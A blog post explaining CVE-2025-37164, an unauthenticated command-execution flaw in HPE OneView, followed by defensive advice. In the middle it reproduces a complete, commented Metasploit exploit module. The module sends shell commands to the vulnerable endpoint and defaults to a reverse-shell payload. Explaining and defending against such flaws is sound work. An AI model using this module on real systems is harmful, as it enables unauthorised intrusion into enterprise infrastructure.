CVE-2025-37164: A Critical Vulnerability That Should Never Exist
Siddhant Bali, an aspiring tech entrepreneur, is an Undergraduate Research Scholar at IIIT Delhi, currently pursuing a B.Tech in Computer Science Engineering with a focus on design (CSD). Excelling in college activities and event management, Siddhant's entrepreneurial spirit propels him into innovative ventures. Connect on LinkedIn or reach out at siddhant22496@iiitd.ac.in for more info.
When “Remote Code Execution” Is a Feature, Not a Bug
This blog explains CVE-2025-37164, a critical security vulnerability found in HPE OneView, in a way that is easy to understand, even if you are new to security.
No buzzwords.
No marketing language.
Just what happened, why it’s bad, and why it matters.
https://nvd.nist.gov/vuln/detail/CVE-2025-37164
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/hpe_oneview_rce.rb
https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbgn04985en_us&docLocale=en_US
https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbgn04985en_us&docLocale=en_US#vulnerability-summary-1
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-37164
What Is HPE OneView?
HPE OneView is enterprise software used by large organizations to manage their physical infrastructure:
Servers
Firmware
Hardware lifecycle
Data center automation
Think of it as a central command dashboard for a company’s infrastructure.
Because of this role:
It has high privileges
It is deeply trusted
It usually sits inside internal networks
It is rarely monitored like public-facing apps
This makes any security flaw in it extremely dangerous.
What Is CVE-2025-37164?
CVE-2025-37164 is a Remote Code Execution (RCE) vulnerability rated 10.0 / Critical.
In simple terms:
Anyone who can reach the OneView interface can make it run commands of their choosing.
No login required
No credentials required
No complex exploitation
No bypass tricks
Public exploits already exist, including a Metasploit module, which means attackers can weaponize this in minutes.
Why This Vulnerability Is So Bad
Most critical vulnerabilities happen because of:
Programming mistakes
Memory bugs
Logic errors
Edge cases
This one does not.
The vulnerability exists because the software exposes an endpoint designed to run system commands.
That is the shocking part.
How the Vulnerability Works (Plain English)
There is a REST API endpoint inside OneView:
/rest/id-pools/execute-command
What does it do?
Accepts an HTTP request
Reads a parameter called
commandExecutes that command on the system
That’s it.
No authentication.
No permission checks.
No meaningful restrictions.
If you send:
command = "whoami"
The system runs it.
This is not clever hacking.
This is remote command execution by design.
##
# This module requires Metasploit to run.
# Metasploit framework provides exploit primitives, payload handling, etc.
# https://metasploit.com/download
#
# Source code for Metasploit framework:
# https://github.com/rapid7/metasploit-framework
##
# Define a Metasploit exploit module class
class MetasploitModule < Msf::Exploit::Remote
# Exploit reliability ranking (used by Metasploit UI)
Rank = ExcellentRanking
# Include HTTP client helpers (send_request_cgi, normalize_uri, SSL, etc.)
include Msf::Exploit::Remote::HttpClient
# Automatically run `check` before exploitation
prepend Msf::Exploit::Remote::AutoCheck
# Module initialization
def initialize(info = {})
super(
update_info(
info,
# Human-readable name shown in Metasploit
'Name' => 'HPE OneView unauthenticated RCE',
# Detailed description of the vulnerability
'Description' => %q{
This module exploits an unauthenticated RCE vulnerability, CVE-2025-37164,
against Hewlett Packard Enterprise (HPE) OneView.
All versions below 11.00 are vulnerable unless the vendor hotfix is applied.
Some VM-based versions disable the vulnerable "ID Pools" endpoint and are
therefore not exploitable.
},
# Metasploit license identifier
'License' => MSF_LICENSE,
# Credits
'Author' => [
# Vulnerability discovery
'Nguyen Quoc Khanh',
# Exploit development and analysis
'remmons-r7',
'sfewer-r7'
],
# External references
'References' => [
['CVE', '2025-37164'],
['URL', 'https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbgn04985en_us&docLocale=en_US'],
['URL', 'https://www.rapid7.com/blog/post/etr-cve-2025-37164-critical-unauthenticated-rce-affecting-hewlett-packard-enterprise-oneview/'],
['URL', 'https://attackerkb.com/topics/ixWdbDvjwX/cve-2025-37164/rapid7-analysis']
],
# Public disclosure date
'DisclosureDate' => '2025-12-16',
# Exploit does not require root privileges
# Command executes as the `trm3` service account
'Privileged' => false,
# Target operating systems
'Platform' => ['unix', 'linux'],
# Payload architecture: command execution
'Arch' => [ARCH_CMD],
# Supported exploit targets
'Targets' => [
[
'Default', {
# Payload constraints
'Payload' => {
# Characters that cannot appear in JSON or command string
'BadChars' => '"\' ',
# Encoder used to bypass space restriction using IFS trick
'Encoder' => 'cmd/ifs'
},
# Default payload used if user does not override
'DefaultOptions' => {
'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp'
}
}
],
],
# Default target index
'DefaultTarget' => 0,
# Default exploit options
'DefaultOptions' => {
'RPORT' => 443, # HTTPS port
'SSL' => true # Use SSL/TLS
},
# Operational notes for users
'Notes' => {
'Stability' => [CRASH_SAFE], # Does not crash service
'Reliability' => [REPEATABLE_SESSION], # Works consistently
'SideEffects' => [IOC_IN_LOGS] # Leaves log artifacts
}
)
)
# Register user-configurable option
# TARGETURI is the base path of the application
register_options([
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
end
# Check if the target is vulnerable
def check
# Query OneView REST API version endpoint
res_ver = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'rest', 'appliance', 'version')
)
# If connection failed
return CheckCode::Unknown('Connection to /rest/appliance/version failed') unless res_ver
# If unexpected HTTP status
return CheckCode::Unknown("Unexpected /rest/appliance/version response code #{res_ver.code}") unless res_ver.code == 200
# Parse JSON version response
json_ver = JSON.parse(res_ver.body)
# Build a human-readable version string
version_string = 'Detected '
version_string += json_ver['modelNumber'] || 'HPE OneView'
version_string += ' version '
version_string += json_ver['softwareVersion'] || 'unknown'
# Generate a benign command with a random UUID
# This is used to test command execution without harm
cmd = "echo #{SecureRandom.uuid}"
# Execute command using vulnerable endpoint
res = execute_cmd(cmd, shell: false)
# If exploit request failed
return CheckCode::Unknown("#{version_string}. Connection failed") unless res
# If endpoint is blocked or removed
# Vendor hotfix rewrites this endpoint to 404
return CheckCode::Safe("#{version_string}. Target endpoint returned response code #{res.code}") if res.code == 404
# Any unexpected status code
return CheckCode::Unknown("#{version_string}. Unexpected response code #{res.code}") unless res.code == 200
# Parse exploit response
j = JSON.parse(res.body)
# If the response confirms execution of our test command
if (j['type'] == 'ExecutableCommand') &&
(j['cmd'] == cmd) &&
(j['result'] == true)
return Exploit::CheckCode::Vulnerable(version_string)
end
# Anything else is inconclusive
CheckCode::Unknown("#{version_string}. Unexpected JSON results")
rescue JSON::ParserError
# Handle malformed JSON
return CheckCode::Unknown('Failed to parse JSON body')
end
# Main exploitation routine
def exploit
# Execute the encoded payload via shell
res = execute_cmd(payload.encoded, shell: true)
# Network failure
fail_with(Msf::Exploit::Failure::UnexpectedReply, 'Connection failed') unless res
# Unexpected HTTP response
fail_with(Msf::Exploit::Failure::UnexpectedReply, "Unexpected response code: #{res.code}") unless res.code == 200
# Parse response
j = JSON.parse(res.body)
# Ensure correct response type
fail_with(Msf::Exploit::Failure::UnexpectedReply,
'Response is not of type ExecutableCommand') if j['type'] != 'ExecutableCommand'
# If Java Runtime.exec failed internally
# We warn instead of failing because payload may still have executed
if j['result'] == false
print_warning(
'Command execution returned a result of false, likely due to an unexpected IOException server-side'
)
end
rescue JSON::ParserError
fail_with(Msf::Exploit::Failure::UnexpectedReply, 'Failed to parse JSON body')
end
# Helper method to execute a command via the vulnerable endpoint
def execute_cmd(cmd, shell:)
send_request_cgi(
'method' => 'PUT',
'uri' => normalize_uri(target_uri.path, 'rest', 'id-pools', 'executeCommand'),
'ctype' => 'application/json',
# JSON payload sent to OneView
'data' => {
# If shell=true, run via `/bin/sh -c`
# Spaces and quotes are avoided using IFS encoder
'cmd' => shell ? "sh -c #{cmd}" : cmd,
# Server will set this to true if execution succeeds
'result' => false
}.to_json
)
end
end
What Level of Access Does an Attacker Get?
The command does not run as root, which is the only small mercy here.
However, the attacker still gets:
A valid local system user
Ability to download tools
Ability to open reverse shells
Ability to pivot deeper into the network
In security terms, this is initial access, which is the hardest step for attackers. Once they have it, everything else becomes easier.
Why This Is Especially Dangerous in Enterprise Environments
HPE OneView is not just another application.
It sits at what’s called the control plane.
That means it can:
Touch many servers at once
Control firmware and hardware behavior
Orchestrate infrastructure changes
Operate with elevated trust
So exploitation is not just:
“Someone ran a command”
It is:
“Someone gained centralized influence over enterprise infrastructure”
This dramatically increases the blast radius.
“But It’s Internal, Right?” — Why That Doesn’t Save You
Many organizations assume internal systems are safe.
They are not.
All it takes is:
One firewall misconfiguration
One exposed interface
One compromised employee laptop
One insider with bad intent
Once someone is on the internal network, this vulnerability becomes a free entry point.
Zero-trust principles exist specifically because this assumption fails so often.
Insider Threat: The Overlooked Risk
This vulnerability is especially dangerous for insider threats.
A disgruntled employee or contractor:
Does not need admin credentials
Does not need malware
Does not need privilege escalation
They can simply send a request and execute commands.
This turns internal access into infrastructure-level power.
The Vendor Fix — And Why It’s Concerning
The provided fix did not remove the dangerous functionality.
Instead, it:
Added HTTP rules
Blocked access to the endpoint
In other words:
“You’re not allowed to go here anymore.”
This approach is fragile because:
Filters can be bypassed
Proxies can forward requests
Internal request routing can re-expose endpoints
History shows these protections fail over time
Security should never rely on “just block the URL.”
What a Proper Fix Would Look Like
A secure design would include:
Removing command execution endpoints entirely
Requiring strong authentication
Restricting execution to tightly scoped actions
Logging and auditing all privileged operations
Separating orchestration logic from system execution
If a feature allows arbitrary command execution, it does not belong in a web-accessible API.
What Organizations Should Do Right Now
If you use HPE OneView:
Patch immediately
Treat this as a potential breach
Review logs for suspicious commands
Monitor outbound network connections
Restrict access to management interfaces
Segment infrastructure control networks
Assume attackers may already have tested this
Do not treat this as a routine update.
Final Thoughts
This vulnerability is not impressive.
It is not clever.
It is not subtle.
It violates basic security principles by exposing raw command execution in a highly trusted system.
When enterprise control software ships with something this dangerous:
Attackers don’t need skill
Defenders lose reaction time
Damage scales quickly
This is why management platforms must be held to the highest security standards, not the lowest.
TL;DR
Critical RCE in enterprise infrastructure software
No authentication required
Extremely easy to exploit
High impact due to trusted position
Patch immediately
Assume breach, not safety
